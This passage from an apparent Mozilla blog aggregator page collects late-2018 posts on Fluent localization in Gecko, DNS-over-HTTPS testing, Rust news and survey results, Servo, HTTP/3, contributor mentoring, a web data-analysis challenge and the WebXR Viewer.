As for migration, we moved along nicely bumping from 500 to around 800 messages thanks to hard work of a number of students mentored by Jared Wein and Gijs Kruitbosch. The students picked up work on the migration as their Capstone project.

Notable changes [intl module]:

Summary

2018 has been much “easier” for the intl module than 2017 was. It’s great to see the how all pieces fit together and for me personally, it enabled me to focus on getting Fluent better integrated into Gecko.

There’s still a lot of work but it now is fully focused on Fluent and localization, while our intl module as a whole goes through a more well earned peaceful period.

Between now and the next status update, we hope to publish a summary post about the last two years of work. Stay tuned!

Mozilla Future Releases BlogNext Steps in DNS-over-HTTPS Testing

Over the past few months, Mozilla has experimented with DNS-over-HTTPS (DoH). The intention is to fix a part of a DNS ecosystem that simply isn’t up to the modern, secure standards that every Internet user should expect. Today, we want to let you know about our next test of the feature.

Our initial tests of DoH studied the time it takes to get a response from Cloudflare’s DoH resolver. The results were very positive – the slowest users show a huge performance improvement. A recent test in our Beta channel confirmed that DoH is fast and isn’t causing problems for our users. However, those tests only measure the DNS operation itself, which isn’t the whole story.

Content Delivery Networks (CDNs) provide localized DNS responses depending on where you are in the network, with the goal being to send you to a host which is near you on the network and therefore will give you the best performance. However, because of the way that Cloudflare resolves names [technical note: it’s a centralized resolver without EDNS Client Subnet], this process works less well when you are using DoH with Firefox.

The result is that the user might get less well-localized results that could result in a slow user experience even if the resolver itself is accurate and fast.

This is something we can test. We are going to study the total time it takes to get a response from the resolver and fetch a web page. To do that, we’re working with Akamai to help us understand more about the performance impact. Firefox users enrolled in the study will automatically fetch data once a day from four test web pages hosted by Akamai, collect information about how long it took to look up DNS and then send that performance information to Firefox engineers for analysis. These test pages aren’t ones that the user would automatically retrieve and just contain dummy content.

A soft rollout to a small portion of users in our Release channel in the United States will begin this week and end next week. As before, this study will use Cloudflare’s DNS-over-HTTPS service and will continue to provide in-browser notifications about the experiment so that everyone is fully informed and has a chance to decline participation in this particular experiment. Moving forward, we are working to build a larger ecosystem of trusted DoH providers, and we hope to be able to experiment with other providers soon.

We don’t yet have a date for the full release of this feature. We will give you a readout of the result of this test and will let you know our future plans at that time. So stay tuned.

The post Next Steps in DNS-over-HTTPS Testing appeared first on Future Releases.

Zibi BranieckiMultilingual Gecko Status Update 2018.2

Welcome to the third edition of Multilingual Gecko Status Update!

In the previous update we covered the work which landed in Firefox 59 and Firefox 60.

At the time, we’ve been finalizing the platform work to support Fluent localization system, and we were in the middle of migration of the first Firefox UI component – Preferences – to it.

Today, we’ll pick up right where we left off!

Firefox 61 (June)

Firefox 61 fits into the trend of things calming down in Intl – and it’s a great news! It means that we are reaching platform maturity after all the groundbreaking refactors in 2017, and we all can focus on the work on top of the modules, rather than playing whack-a-mole fixing bugs and adding missing features.

The biggest platform change is really just an update to ICU 61 which Andre landed in March and my work on adding mozIntl.RelativeTimeFormat and mozIntl.getLocaleDisplayNames.

The former gave us a stable unified API for presenting relative time (such as “In 5 minutes” or “10 days ago”) while the latter unified how we present language, region and combinations of those in our user interface based on the Unicode CLDR representation (example: “English (United States)”).

As I explained in my earliest posts, one of the things I’m particularly proud of is that we go the extra mile to use every such opportunity to not only fix the immediate Firefox UI need, but also push such proposals for standardization and in result make the Web Platform more complete.

In this case, Intl.RelativeTimeFormat has been proposed and thanks to amazing work by Daniel Ehrenberg is now in Stage 3 and soon will be exposed to all web developers in all browsers! Intl.getLocaleDisplayNames is less mature but the work on it just picked up.

Firefox migration to Fluent reached its next milestone moving from just a couple messages to over 100 Fluent messages in Firefox!

Notable changes [my work] [intl module]:

Firefox 62 (September)

Another calm cycle! The biggest feature was the introduction of the pseudolocalization in Firefox which I blogged about, and landing of the developer documentation.

The documentation has been insanely useful in distributing knowledge and helping engineers feel more comfortable working with the new stack, and I’m very happy we reached a stage where landing a documentation is the big news 🙂

In the Fluent land we spent the March-May timeframe moving from a 100 messages to 500 Fluent messages in Firefox!

Notable changes [my work] [intl module]:

Firefox 63 (October)

This cycle was quite similar to the previous one, with a bulk of work going into regular maintenance and cleanups.

For my work, the trend is to start integrating Fluent deeper into Gecko with more work around L10nRegistry v1 limitations and getting deeper DOM integration to improve XUL performance.

In this cycle I landed a XPCOM mozIDOMLocalization API which allows us to call Fluent from C++ and was required for a bigger change that we landed in Firefox 64.

One new theme is Kris Maglione who started working on reducing the performance and memory overhead coming from the old StringBundle API (used for .properties). With all the new work centralized around Fluent, but with a large portion of our strings still using StringBundle, it becomes a great target for optimizations by cutting out everything we don’t use and now we know – we never will.

Notable changes [my work] [intl module]:

Firefox 64 (December)

This release, is still getting stabilized and will get released in December, but the work cycle on it happened between September and October, so I can already provide you an account of that work!

Besides of a regular stack of cleanups coming from Henri and me, we’ve seen Ehsan Akhgari taking over from Kris to remove more lines of unused code.

The really big change was the introduction of DocumentL10n API which is a C++ API with its own WebIDL tightly integrated into the very core of DOM module in Gecko – nsIDocument.

Before that Fluent lived in Gecko in some form of a glorified javascript library. While it is Fluent’s goal to target the web platform, Firefox UI is inherently different from the web content and benefits from better integration between the DOM and its localization component.

This change allowed us to better integrate localization into the document’s life cycle, but what’s even more important, it allowed us to expose Fluent to documents that usually do not have special privileges and could not access Fluent before.

As for migration, we moved along nicely bumping from 500 to around 800 messages thanks to hard work of a number of students mentored by Jared Wein and Gijs Kruitbosch. The students picked up work on the migration as their Capstone project.

Notable changes [my work] [intl module]:

Summary

2018 has been much “easier” for the intl module than 2017 was. It’s great to see the how all pieces fit together and for me personally, it enabled me to focus on getting Fluent better integrated into Gecko.

There’s still a lot of work but it now is fully focused on Fluent and localization, while our intl module as a whole goes through a more well earned peaceful period.

Between now and the next status update, I hope to publish a summary post about the last two years of work. Stay tuned!

The Mozilla BlogState of Mozilla 2017: Annual Report

The State of Mozilla annual report for 2017 is now available here.

The new report outlines how Mozilla operates, provides key information on the ways in which we’ve made an impact, and includes details from our financial reports for 2017. The State of Mozilla report release is timed to coincide with when we submit the Mozilla non-profit tax filing for the previous calendar year.

Mozilla is unique. We were founded nearly 20 years ago with the mission to ensure the internet is a global public resource that is open and accessible to all. That mission is as important now as it has ever been.

The demand to keep the internet transparent and accessible to all, while preserving user control of their data, has always been an imperative for us and it’s increasingly become one for consumers. From internet health to digital rights to open source — the movement of people working on internet issues is growing — and Mozilla is at the forefront of the fight.

We measure our success not only by the adoption of our products, but also by our ability to increase the control people have in their online lives, our impact on the internet, our contribution to standards, and how we work to protect the overall health of the web.

As we look ahead, we know that leading the charge in changing the culture of the internet will mean doing more to develop the direct relationships that will make the Firefox and Mozilla experiences fully responsive to the needs of consumers today.

We’re glad not to be at this alone. None of the work we do or the impact we have would be possible without the dedication of our global community of contributors and loyal Firefox users. We are incredibly grateful for the support and we will continue to fight for the open internet.

We encourage you to get involved to help protect the future of the internet, join Mozilla.

The post State of Mozilla 2017: Annual Report appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 50

Highlights

Friends of the Firefox team

Introductions

  • Gijs introduces Patricia Lawless (:plawless)! Welcome!

Resolved bugs (excluding employees)

Project Updates

Activity Stream

  • CFR experiment (addon recommendation) in 63
  • Prefed on (in nightly) the new implementation of snippets on about:home and about:newtab
    • Same looks but removed security risks
  • Using attribution parameters to show different onboarding messages to user based on how they installed Firefox

Application Services (Sync / Firefox Accounts / Push)

  • A lot of exciting work happening on mobile. 🦊📱
    • Mark has history sync working between the Android Components reference browser and Desktop! 🕒
      • Showing the Firefox Sync settings in the Android Components reference browser

        Hooray for code re-usability!

    • Mark also wired up our Rust Places library to provide autocomplete suggestions for the Android Components AwesomeBar. 📇
    • Edouard and Ryan wired up the Android Components reference browser to the new client instance metadata API. This will power device names, as well as the new, faster “send tab to device”. ✉️
    • Thom is continuing to improve our FFI layer, which lets our Android projects (and iOS, and, some day, Desktop!) consume our Rust syncing and storage libraries. 🛠
    • Thom and Nick have also been working on shipping composite builds, with all the Application Services Rust components in a single library. 📦
    • JR is sketching out an API for a Rust Push component, which we’ll use on mobile first, and eventually replace the push client on Desktop. 📣
    • Lina added history collection to GeckoView and the GeckoView engine in Android Components, and some fixes for new bookmark sync. 📚

Fission

Fluent

Mobile

Android Components
  • Last week we released version 0.31.0 and this week 0.32.0 of Android Components. Some highlights of those releases:
    • NestedGeckoView / NestedWebView implementations to synchronize scrolling with a toolbar or other views (e.g. hiding the toolbar when the web content is scrolled).
    • A new component called concept-fetch defining an abstract definition of an HTTP client for fetching resources. In 0.32.0 we landed two implementations of this concept based on HttpURLConnection and okHttp (GeckoView/Necko implementation to follow soon). Eventually all HTTP client code in the components will be replaced with concept-fetch and consumers can decide what HTTP client implementation components should use in an app.
    • Permission requests of content (e.g. camera, location, protected media playback, ..) can now be observed and processed via the browser session component.
    • A rewritten, configurable session storage for persisting the session state to disk.
  • In addition to that we landed a lot of improvements in our Reference Browser (Nightly builds available here):
    • Integrated crash reporting using lib-crash component.
    • Added awesome bar using browser-awesomebar component.
    • Toolbar is hiding automatically now when scrolling web content.
    • Added browser-storage-sync component for saving and syncing browser history soon.

Performance

  • dthayer
    • Work on document splitting is ongoing. This will allow us to eventually output these to separate framebuffers which we can hand to the OS compositor, allowing us to not have to paint the whole window every time something in the chrome changes / animates.
    • Doing some scaffolding work to support having async work inside PromiseWorkers.
  • Felipe
    • Tab animation work is ongoing
    • Try builds generated and waiting for feedback from UX
    • Cleaning up patches to start feedback/early-review cycles
  • Florian
    • QA is testing the new about:performance features.
    • Fixing more bugs (rtl, minor layout issues, etc.)
    • Working on a tool to explore BHR (background hang reporter) data – feedback welcome!
  • Gijs
    • Continuing to experiment with lowering vsync frame rate on low-end devices to improve performance there.
    • Landed a fix to make the initial tab remote immediately, to avoid loading about:blank in the parent first. Continuing work on reducing about:blank-loading overhead.
    • Chasing a Linux-only leak regression in our printing tests that seems to have to do with the focus manager holding on to a content window indefinitely.
  • mconley

Policy Engine

  • Uplifted to beta and ESR policies for:
    • Certificates
    • Locale switching
    • Startup choices (restore session, new tab page..)
    • Updating Extensions
  • Platform-level macOS support also uplifted for beta/ESR
  • Removed the concept of GPO machine-only policies, which simplifies usage and documentation

Search and Navigation

Search Shortcuts Improvements
Quantum Bar
Places

Web Payments

Mozilla Privacy BlogBrussels Mozilla Mornings: Critically assessing the EU Terrorist Content regulation

On the morning of 12 December, Mozilla will host the first of our Brussels Mozilla Mornings series – regular breakfast meetings where we bring together policy experts, policy-makers and practitioners for insight and discussion on latest EU digital policy developments. This first session will focus on the recently-proposed EU Terrorist Content regulation.

The panel discussion will seek to unpack the Commission’s legislative proposal – what it means for the internet, users’ rights, and the fight against terrorism. The discussions will be substantive in nature, and will deal with some of the most contentious issues in the proposal, including the 60 minute takedown procedure and upload filtering obligations.

Speakers

Fanny Hidvégi, Access Now
Joris van Hoboken, Free University of Brussels
Owen Bennett, Mozilla

Moderated by Jen Baker

Logistical details

08:30-10:00
Wednesday 12 December
Radisson RED hotel, rue d’Idalie 35, Brussels

Register your attendance here.

The post Brussels Mozilla Mornings: Critically assessing the EU Terrorist Content regulation appeared first on Open Policy & Advocacy.

QMOFirefox 64 Beta 12 Testday Results

Hello Mozillians!

As you may already know, last Friday November 23th – we held a new Testday event, for Firefox 64 Beta 12.

Thank you all for helping us make Mozilla a better place: Gabriela, Kamila kamciatek, Amirtha V and Priyadharshini A.

Results:

– several test cases executed for the Multi-select tabs and Widevine CDM features. During this session, 3 new issues were reported!
– bugs verified: 1495081148837 and 1483591

Thanks for another successful testday! 🙂

This Week In RustThis Week in Rust 262

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is modulator, a crate of abstract modulators for use in audio synthesizers (and possibly elsewhere). Thanks to Andrea Pessino for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

173 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Africa
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

"I did not want to inflict memory management on my son" – @M_a_s_s_i

– Massimiliano Mantione during his RustFest talk

Thanks to llogiq for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

The Rust Programming Language BlogRust Survey 2018 Results

Another year means another Rust survey, and this year marks Rust's third annual survey. This year, the survey launched for the first time in multiple languages. In total 14 languages, in addition to English, were covered. The results from non-English languages totalled 25% of all responses and helped pushed the number of responses to a new record of 5991 responses. Before we begin the analysis, we just want to give a big "thank you!" to all the people who took the time to respond and give us your thoughts. It’s because of your help that Rust will continue to improve year after year.

Do you use Rust

Despite having an increase in the number of responses, this year also saw an increase in the percentage of Rust users. Up from last year’s 66.9% Rust users, this year nearly three-quarters of responses were from Rust users.

Rust Users

Time with Rust

How long have you worked in Rust

We’re seeing a steady stream of new users into Rust. At the time of the survey, ~23% of Rust users had been using it for 3 months or less. Likewise, nearly a quarter of the users have used Rust for at least 2 years.

How long did it take to be productive

Over 40% of Rust users felt productive in Rust in less than a month of use, and over 70% felt productive in their first year. Unfortunately, there is a noticeable struggle among users, as over 22% do not yet feel productive.

How long have you been unproductive

Looking closer at these users who feel unproductive in Rust, only about 25% are in their first month of use. The challenge here is to find ways to help bridge users to productivity so they don't get stuck.

How much do you use Rust?

Size of summed Rust projects

Rust projects are continuing to trend to larger sizes, with larger overall investments. Medium to large investments in Rust (those totally over 10k and 100k lines of code respectively) have grown from 8.9% in 2016, to 16% in 2017, to 23% this year.

How often do you use Rust

We’ve also seen a growth in Rust regular usage. Up from 17.5% last year, Rust daily usage is now nearly a quarter of users. In total, Rust weekly total usage has risen from 60.8% to 66.4%.

Rust expertise

How would you rate your Rust expertise

Rather than being a simple curve, Rust expertise has two peaks: one around a "3", and another at "7", showing that users tend to see themselves as just above beginner or experienced without necessarily being expert.

How difficult are Rust concepts

Rust users generally felt that Enums and Cargo were largely easy concepts; followed by Iterators, Modules, and Traits. More challenging concepts of Trait Bounds and Unsafe came next. Lastly, the most challenging concepts were Macros, Ownership & Borrowing, and Lifetimes. These challenges match closely to feedback we’ve heard in years past and continue to be a focus of continued productivity improvements like NLL and the continued macro system improvements.

What programming languages are you familiar with

Humorously, we see that Rust isn't actually the top programming language that users were familiar with. Instead, it pulled in a 2nd place behind Python.

Rust toolchain

Which Rust version do you use

We’re seeing similar numbers in users of the current stable release since last year. Perhaps surprisingly, we’re continuing to see a rise in the number of users who use the Nightly compiler in their workflow. For the second year in a row, Nightly usage has continued to rise, and is now over 56% (up from 51.6% of last year).

When asked why they used nightly, people responded with a broad range of reasons including: access to 2018 edition, asm, async/await, clippy, embedded development, rocket, NLL, proc macros, and wasm.

Has upgrading the compiler broken your code

The percentage of people who see a breakage during a routine compiler update has stayed the same since last year, with 7.4% saying they’ve experienced breakage.

If so how much work to fix it

Breakages generally leaned to requiring minor fixes, though some reported having moderate or major fixes to upgrade to the next stable compiler.

Preferred install method

We again see a strong showing for rustup, which continues to hold at 90% of Rust installs. Linux distros follow as a distant second at 17%.

Experience with Rust tools

Tools like rustfmt and rustdoc had a strong show, with lots of positive support. Following these is the clippy tool -- despite having fewer users, its users enjoy the tool. The IDE support tools Rust Language Server and racer had positive support but unfortunately, of the tools surveyed, generated a few more dislike votes and comments. The bindgen tool has relatively small userbase.

Rust workflow

Which platform are you developing on

Linux continues to be a powerhouse among Rust developers, holding on to roughly 80% of Rust developers. Windows usage has grown slightly from 31% last year to 34% this year, its second year in a row of growth.

Which platforms are you developing for

Linux and Windows continued to show strongly as targets for Rust applications. Other platforms held largely the same as last year, with one exception: WebAssembly. The new technology has showed impressive growth, nearly doubling from last year's 13% to this year's 24%.

What editors do you use

Vim, the front-runner in editors for two years has now finally been bested by VSCode, which grew from 33.8% of Rust developers to 44.4% this year.

Rust at work

Do you use Rust at work

Rust continues is slow-and-steady growth in the workplace. We're now seeing year-over-year growth of full-time and part-time Rust, growing from last year's 4.4% full-time and 16.6% part-time to this year's 8.9% full-time and 21.2% part-time, a doubling of full-time Rust commercial use. In total, Rust commercial use grew from 21% to just over 30% of Rust users.

Is your company evaluating Rust

There is more room for Rust to grow into more companies, over a third of which users report aren't currently looking into evaluating Rust in the coming year. When paired with the survey data that said that nearly half of non-users needed the company support, this shows the need for further company outreach or more company-focused information about Rust.

Feeling welcome

Do you feel welcome in the Rust community

An important part of the Rust community efforts are ensuring that the Rust project is a welcoming place for its users. New users should feel encouraged to explore, share ideas, and generally be themselves.

When asked, both current Rust users and non-users largely felt welcome, though over a quarter of responses weren't sure. There was also some regional variation in these responses. For example, responses on the Russian version of the survey showed double the percent of unwelcome feelings at 4%. Mainland China showed even more at 8%.

There's a challenge here to help Rust communities worldwide feel like they are part of what makes Rust unique, as Rust continues to grow a strong presence in more areas of the world.

Are you underrepresented in tech

The number of people in Rust who self-identify as being part of a group underrepresented in technology is growing slowly year-over-year. The survey also highlights some challenges, as the number of women is still lower than the industry average of women in programming fields.

Rust Non-Users

A big part of a welcoming Rust community is reaching out to non-users as well. As we have in years past, we again asked the reasons why people weren't using Rust.

How long before you stopped

For those who stopped using Rust, just over 50% stopped using Rust in less than a month. Likewise, roughly 50% of people who left Rust managed to use it for more than a month before stopping.

Why are you not using Rust

Many non-users responded that they did want to learn Rust, but there were factors that slowed them down. First among these is that the companies the responders work for do not themselves use Rust. Nearly one half of the non-users were blocked by the lack of company support.

Additionally, 1 in 4 non-users were slowed by the feeling of Rust being too intimidating or complicated. The work towards improving Rust IDE support has helped (down from 25% to 16%), though we still see a strong push towards even better IDE support among non-users.

Challenges

As we've done in past years, we asked for your comments in where Rust can improve. This year, we see some familiar themes as well as some new ones in this feedback. The top ten themes this year are:

  1. the need for better library support
  2. a more improved IDE experience
  3. the need for broader adoption of Rust generally
  4. a richer ecosystem of tools and support
  5. an improved learning curve
  6. the need for important language features and crates to be stable and supported
  7. support for async programming
  8. support for GUI development
  9. better documentation
  10. improved compile times

New this year is the rising need to support GUI development, showing that Rust continues to grow not only on the server, but that people are feeling the need to stretch into application development.

"Improve Rust marketing. Many people don't know about it"

Comments remind us that while Rust may be well-known in some circles, it still has room to grow and in many tech circles Rust may not yet be well-known.

"Keeping a focus on adoption/tutorials/books/novice experience will pay dividends in the years to come."

In addition to outreach, a broader set of documentation would in turn help reach a broader audience.

"Stability and maturity of developer tools, make it easier to get a working setup and to debug applications"

Many people commented on the IDE support, pointing out not only instability or inaccuracy in the RLS, but also the need for a much stronger IDE story that covered more areas, like easier debugging.

"The maturity of the ecosystem and libraries. Have a good ecosystem of "standard" libraries is key for the future of the language"

A common theme continues to be the need to push libraries to completion and grow the set of "standard" libraries that users can use. Some comments point out this isn't the fault of maintainers, who are already working hard to write and publish the crates, but that generally more companies need to get involved and offer commercial support.

"Ergonomics and discoverability of "putting it together" documentation"

Some people pointed out that ergonomics goes hand in hand with richer documentation, seeing that these aren't separate concepts but rather challenges that should be tackled together in a unified approach.

Looking forward

This year saw the strongest survey yet. Not only was it the largest community survey, it was the first to cover languages outside of English. Rust continues to grow steadily, and with it, both its strengths and challenges are introduced to a broader audience.

We look forward to using your feedback in planning for 2019, and we're excited to see where we can take Rust next.

William LachanceMaking contribution work for Firefox tooling and data projects

One of my favorite parts about Mozilla is mentoring and working alongside third party contributors. Somewhat surprisingly since I work on internal tools, I’ve had a fair amount of luck finding people to help work on projects within my purview: mozregression, perfherder, metrics graphics, and others have all benefited from the contributions of people outside of Mozilla.

In most cases (a notable exception being metrics graphics), these have been internal-tooling projects used by others to debug, develop, or otherwise understand the behaviour of Firefox. On the face of it, none of the things I work on are exactly “high profile cutting edge stuff” in the way, say, Firefox or the Rust Programming Language are. So why do they bother? The exact formula varies depending on contributor, but I think it usually comes down to some combination of these two things:

  1. A desire to learn and demonstrate competence with industry standard tooling (the python programming language, frontend web development, backend databases, “big data” technologies like Parquet, …).
  2. A desire to work with and gain recognition inside of a community of like-minded people.

Pretty basic, obvious stuff — there is an appeal here to basic human desires like the need for security and a sense of belonging. Once someone’s “in the loop”, so to speak, generally things take care of themselves. The real challenge, I’ve found, is getting people from the “I am potentially interested in doing something with Mozilla internal tools” to the stage that they are confident and competent enough to work in a reasonably self-directed way. When I was on the A-Team, we classified this transition in terms of a commitment curve:

prototype commitment curve graphic by Steven Brown

The hardest part, in my experience, is the initial part of that curve. At this point, people are just dipping their toe in the water. Some may not have a ton of experience with software development yet. In other cases, my projects may just not be the right fit for them. But of course, sometimes there is a fit, or at least one could be developed! What I’ve found most helpful is “clearing a viable path” forward for the right kind of contributor. That is, some kind of initial hypothesis of what a successful contribution experience would look like as a new person transitions from “explorer” stage in the chart above to “associate”.

I don’t exactly have a perfect template for what “clearing a path” looks like in every case. It depends quite a bit on the nature of the contributor. But there are some common themes that I’ve found effective:

First, provide good, concise documentation both on the project’s purpose and vision and how to get started easily and keep it up to date. For projects with a front-end web component, I try to decouple the front end parts from the backend services so that people can yarn install && yarn start their way to success. Being able to see the project in action quickly (and not getting stuck on some mundane getting started step) is key in maintaining initial interest.

Second, provide a set of good starter issues (sometimes called “good first bugs”) for people to work on. Generally these would be non-critical-path type issues that have straightforward instructions to resolve and fix. Again, the idea here is to give people a sense of quick progress and resolution, a “yes I can actually do this” sort of feeling. But be careful not to let a contributor get stuck here! These bugs take a disproportionate amount of effort to file and mentor compared to their actual value — the key is to progress the contributor to the next level once it’s clear they can handle the basics involved in solving such an issue (checking out the source code, applying a fix, submitting a patch, etc). Otherwise you’re going to feel frustrated and wonder why you’re on an endless treadmill of writing up trivial bugs.

Third, once a contributor has established themselves by fixing a few of these simple issues, I try to get to know them a little better. Send them an email, learn where they’re from, invite them to chat on the project channel if they can. At the same time, this is an opportunity to craft a somewhat larger piece of work (a sort of mini-project) that they can do, tailored to the interests. For example, a new contributor on the Mission Control has recently been working on adding Jest tests to the project — I provided some basic guidance of things to look at, but did not dictate exactly how to perform the task. They figured that out for themselves.

As time goes by, you just continue this process. Depending on the contributor, they may start coming up with their own ideas for how a project might be improved or they might still want to follow your lead (or that of the team), but at the least I generally see an improvement in their self-directedness and confidence after a period of sustained contribution. In either case, the key to success remains the same: sustained and positive communication and sharing of goals and aspirations, making sure that both parties are getting something positive out of the experience. Where possible, I try to include contributors in team meetings. Where there’s an especially close working relationship (e.g. Google Summer of Code). I try to set up a weekly one on one. Regardless, I make reviewing code, answering questions, and providing suggestions on how to move forward a top priority (i.e. not something I’ll leave for a few days). It’s the least I can do if someone is willing to take time out to contribute to my project.

If this seems similar to the best practices for how members of a team should onboard each other and work together, that’s not really a coincidence. Obviously the relationship is a little different because we’re not operating with a formal managerial structure and usually the work is unpaid: I try to bear that mind and make double sure that contributors are really getting some useful skills and habits that they can take with them to future jobs and other opportunities, while also emphasizing that their code contributions are their own, not Mozilla’s. So far it seems to have worked out pretty well for all concerned (me, Mozilla, and the contributors).

Daniel StenbergHTTP/3 Explained

I’m happy to tell that the booklet HTTP/3 Explained is now ready for the world. It is entirely free and open and is available in several different formats to fit your reading habits. (It is not available on dead trees.)

The book describes what HTTP/3 and its underlying transport protocol QUIC are, why they exist, what features they have and how they work. The book is meant to be readable and understandable for most people with a rudimentary level of network knowledge or better.

These protocols are not done yet, there aren’t even any implementation of these protocols in the main browsers yet! The book will be updated and extended along the way when things change, implementations mature and the protocols settle.

If you find bugs, mistakes, something that needs to be explained better/deeper or otherwise want to help out with the contents, file a bug!

It was just a short while ago I mentioned the decision to change the name of the protocol to HTTP/3. That triggered me to refresh my document in progress and there are now over 8,000 words there to help.

The entire HTTP/3 Explained contents are available on github.

If you haven’t caught up with HTTP/2 quite yet, don’t worry. We have you covered for that as well, with the http2 explained book.

Daniel PocockUN Forum on Business and Human Rights

This week I'm at the UN Forum on Business and Human Rights in Geneva.

What is the level of influence that businesses exert in the free software community? Do we need to be more transparent about it? Does it pose a risk to our volunteers and contributors?

The Servo BlogThis Week In Servo 119

In the past 3 weeks, we merged 243 PRs in the Servo organization’s repositories.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Notable Additions

  • avadacatavra created the infrastructure for implementing the Resource Timing and Navigation Timing web standards.
  • mandreyel added support for tracking focused documents in unique top-level browsing contexts.
  • SimonSapin updated many crates to the Rust 2018 edition.
  • ajeffrey improved the Magic Leap port in several ways.
  • nox implemented some missing WebGL extensions.
  • eijebong fixed a bug with fetching large HTTP responses.
  • cybai added support for firing the rejectionhandled DOM event.
  • Avanthikaa and others implemented additional oscillator node types.
  • jdm made scrolling work more naturally on backgrounds of scrollable content.
  • SimonSapin added support for macOS builds to the Taskcluster CI setup.
  • paulrouget made rust-mozjs support long-term reuse without reinitializing the library.
  • paulrouget fixed a build issue breaking WebVR support on android devices.
  • nox cleaned up a lot of texture-related WebGL code.
  • ajeffrey added a laser pointer in the Magic Leap port for interacting with web content.
  • pyfisch made webdriver composition events trigger corresponding DOM events.
  • nox reduced the amount of copying required when using HTML images for WebGL textures.
  • vn-ki implemented the missing JS contrstructor for HTML audio elements.
  • Manishearth added support for touch events on Android devices.
  • SimonSapin improved the treeherder output for the new Taskcluster CI.
  • jdm fixed a WebGL regression breaking non-three.js content on Android devices.
  • paulrouget made Servo shut down synchronously to avoid crashes on Oculus devices.
  • Darkspirit regenerated several important files used for HSTS and network requests.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Mozilla Open Innovation TeamOverscripted Web: a Mozilla Data Analysis Challenge

Help us explore the unseen JavaScript and what this means for the Web

<figcaption>Photo by Markus Spiske on Unsplash</figcaption>

What happens while you are browsing the Web? Mozilla wants to invite data and computer scientists, students and interested communities to join the “Overscripted Web: a Data Analysis Challenge”, and help explore JavaScript running in browsers and what this means for users. We gathered a rich dataset and we are looking for exciting new observations, patterns and research findings that help to better understand the Web. We want to bring the winners to speak at MozFest, our annual festival for the open Internet held in London.

The Dataset

Two cohorts of Canadian Undergraduate interns worked on data collection and subsequent analysis. The Mozilla Systems Research Group is now open sourcing a dataset of publicly available information that was collected by a Web crawl in November 2017. This dataset is currently being used to help inform product teams at Mozilla. The primary analysis from the students focused on:

  • Session replay analysis: when do websites replay your behavior in the site
  • Eval and dynamically created function calls
  • Cryptojacking: websites using user’s computers to mine cryptocurrencies are mainly video streaming sites

Take a look on Mozilla’s Hacks blog for a longer description of the analysis.

The Data Analysis Challenge

We see great potential in this dataset and believe that our analysis has only scratched the surface of the insights it can offer. We want to empower the community to use this data to better understand what is happening on the Web today, which is why Mozilla’s Systems Research Group and Open Innovation team partnered together to launch this challenge.

We have looked at how other organizations enable and speed up scientific discoveries through collaboratively analyzing large datasets. We’d love to follow this exploratory path: We want to encourage the crowd to think outside the proverbial box, get creative, get under the surface. We hope participants get excited to dig into the JavaScript executions data and come up with new observations, patterns, research findings.

To guide thinking, we’re dividing the Challenge into three categories:

  1. Tracking and Privacy
  2. Web Technologies and the Shape of the Modern Web
  3. Equality, Neutrality, and Law

You will find all of the necessary information to join on the Challenge website. The submissions will close on August 31st and the winners will be announced on September 14th. We will bring the winners of the best three analyses (one per category) to MozFest, the world’s leading festival for the open internet movement, taking place in London from October 26th to the 28th 2018. We will cover their airfare, hotel, admission/registration, and if necessary visa fees in accordance to the official rules. We may also invite the winners to do 15-minute presentations of their findings.

We are looking forward to the diverse and innovative approaches from the data science community and we want to specifically encourage young data scientists and students to take a stab at this dataset. It could be the basis for your final university project and analyzing it can grow your data science skills and build your resumé (and GitHub profile!). The Web gets more complex by the minute, keeping it safe and open can only happen if we work together. Join us!


Overscripted Web: a Mozilla Data Analysis Challenge was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Mozilla VR BlogUpdating the WebXR Viewer for iOS 12 / ARKit 2.0

Over the past few months, we're continuing to leverage the features of ARKit on iOS to enhance the WebXR Viewer app and explore ideas and issues with WebXR. One big question with WebXR on modern AR and VR platforms is how to best leverage the platform to provide a frictionless experience while also supporting the advanced capabilities users will expect, in a safe and platform independent way.
Updating the WebXR Viewer for iOS 12 / ARKit 2.0

Last year, we created an experimental version of an API for WebXR and built the WebXR Viewer iOS app to allow ourselves and others to experiment with WebXR on iOS using ARKit. In the near future, the WebXR Device API will be finalized and implementations will be begin to appear; we're already working on a new Javascript library that allows the WebXR Viewer to expose the new API, and expect to ship an update with the official API shortly after the webxr polyfill is updated to match the final API.

We recently released an update to the WebXR Viewer that that fixes some small bugs and updates the app to iOS 12 and ARKit 2.0 (we haven't exposed all of ARKit 2.0 yet, but expect to over the next coming months). Beyond just bug fixes, two features of the new app highlight interesting questions for WebXR related to privacy, friction and platform independence.

First, Web browsers can decrease friction for users moving from one AR experience to another by managing the underlying platform efficiently and not shutting it down completely between sessions, but care needs to be taken to not to expose data to applications that might surprise users.

Second, some advanced features imagined for WebXR are not (yet) available in a cross platform way, such as shareable world maps or persistent anchors. These capabilities are core to experiences users will expect, such as persistent content in the world or shared experiences between multiple co-located people.

In both cases, it is unclear what the right answer is.

Frictionless Experience and User Privacy

